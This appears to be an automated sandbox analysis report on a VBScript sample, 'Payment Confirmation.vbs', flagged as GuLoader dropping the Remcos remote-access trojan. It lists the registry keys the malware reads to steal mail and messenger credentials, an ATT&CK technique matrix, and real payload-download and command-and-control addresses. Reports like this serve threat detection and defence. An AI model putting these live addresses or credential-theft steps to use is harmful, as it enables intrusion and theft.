                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword12_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7712, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-KECL2IJump to behavior
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                221
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)212
                Process Injection
                1
                Software Packing
                2
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter
                Login HookLogin Hook1
                DLL Side-Loading
                1
                Credentials In Files
                129
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets131
                Security Software Discovery
                SSH2
                Clipboard Data
                2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture112
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465864 Sample: Payment Confirmation.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 40 geoplugin.net 2->40 42 198.187.3.20.in-addr.arpa 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 11 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49706, 60018, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.161, 1993, 60022, 60023 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 60024, 80 ATOM86-ASATOM86NL Netherlands 24->46 38 C:\ProgramData\remcos\logs.dat, data 24->38 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Payment Confirmation.vbs3%ReversingLabs
                Payment Confirmation.vbs3%VirustotalBrowse
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                geoplugin.net1%VirustotalBrowse
                198.187.3.20.in-addr.arpa1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://103.237.86.247/Daguerre0%Avira URL Cloudsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.flaeters0%Avira URL Cloudsafe
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c30%Avira URL Cloudsafe
                http://103.237.86.2470%VirustotalBrowse
                https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
                https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                http://103.237.86.2470%Avira URL Cloudsafe
                http://103.237.860%Avira URL Cloudsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypi0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreo0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreot0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
                http://www.nirsoft.net0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                http://103.2370%Avira URL Cloudsafe
                http://103.237.0%Avira URL Cloudsafe
                103.237.87.1610%Avira URL Cloudsafe
                http://103.237.86.247/D0%Avira URL Cloudsafe
                http://103.237.80%Avira URL Cloudsafe
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotyp0%Avira URL Cloudsafe
                http://103.20%Avira URL Cloudsafe
                http://103.237.0%VirustotalBrowse
                http://103.2370%VirustotalBrowse
                http://103.237.80%VirustotalBrowse
                http://103.237.86.0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://103.237.86.247/Da0%Avira URL Cloudsafe
                http://103.21%VirustotalBrowse
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.flaP0%Avira URL Cloudsafe
                http://www.imvu.comata0%Avira URL Cloudsafe
                http://103.237H0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.0%Avira URL Cloudsafe
                https://www.office.com/0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%VirustotalBrowse
                http://103.237.86.247/nsQUkTChtPKgp70.bin0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiern0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%VirustotalBrowse
                http://103.237.86.247/Daguerr0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.f0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.fl0%Avira URL Cloudsafe
                https://www.office.com/0%VirustotalBrowse
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e590%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.flaXR0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.fla0%Avira URL Cloudsafe
                http://103.237.86.20%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes.flaSunvider0%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://103.237.86.247/Dagu0%Avira URL Cloudsafe
                http://103.237.86.247/0%Avira URL Cloudsafe
                http://103.237.86.240%Avira URL Cloudsafe
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn0%Avira URL Cloudsafe
                http://crl.micro0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                http://103.237.86.247/Dag0%Avira URL Cloudsafe
                http://103.237.86.247/Daguer0%Avira URL Cloudsafe
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be7170%Avira URL Cloudsafe
                http://103.237.86.247/Dague0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypierne0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpHz0%Avira URL Cloudsafe
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe932690%Avira URL Cloudsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypiernes0%Avira URL Cloudsafe
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc80%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypie0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreotypier0%Avira URL Cloudsafe
                http://103.237.86.247/Daguerreoty0%Avira URL Cloudsafe
                http://103.230%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalseunknown
                geoplugin.net
                178.237.33.50
                truefalseunknown
                198.187.3.20.in-addr.arpa
                unknown
                unknownfalseunknown
                NameMaliciousAntivirus DetectionReputation
                103.237.87.161true
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/nsQUkTChtPKgp70.binfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.flafalse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://103.237.86.247/Daguerreotypiernes.flaeterspowershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LObhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comrwab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerrepowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingthbhvB28E.tmp.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.nirsoft.netwab.exe, 0000000B.00000002.1848453717.0000000000584000.00000004.00000010.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingaotakbhvB28E.tmp.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://deff.nelreports.net/api/report?cat=msnbhvB28E.tmp.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypipowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.comwab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreopowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Dpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.8powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotyppowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.2powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Dapowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.nirsoft.net/wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.flaPpowershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comatawab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237Hpowershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.office.com/bhvB28E.tmp.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Daguerrpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.fpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.flpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://go.micropowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comwab.exe, wab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=wsbbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.flaXRpowershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernes.flaSunviderpowershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.2powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Dagupowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.24powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEnbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.micropowershell.exe, 00000005.00000002.1767599813.0000000007240000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingaotbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Dagpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguepowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernepowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpHzwab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypiernespowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96ddbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingrmsbhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.com/accounts/serviceloginwab.exefalse
                • Avira URL Cloud: safe
                unknown
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Daguerreotypierpowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Daguerreotypiepowershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.23powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ebuddy.comwab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&bhvB28E.tmp.11.drfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
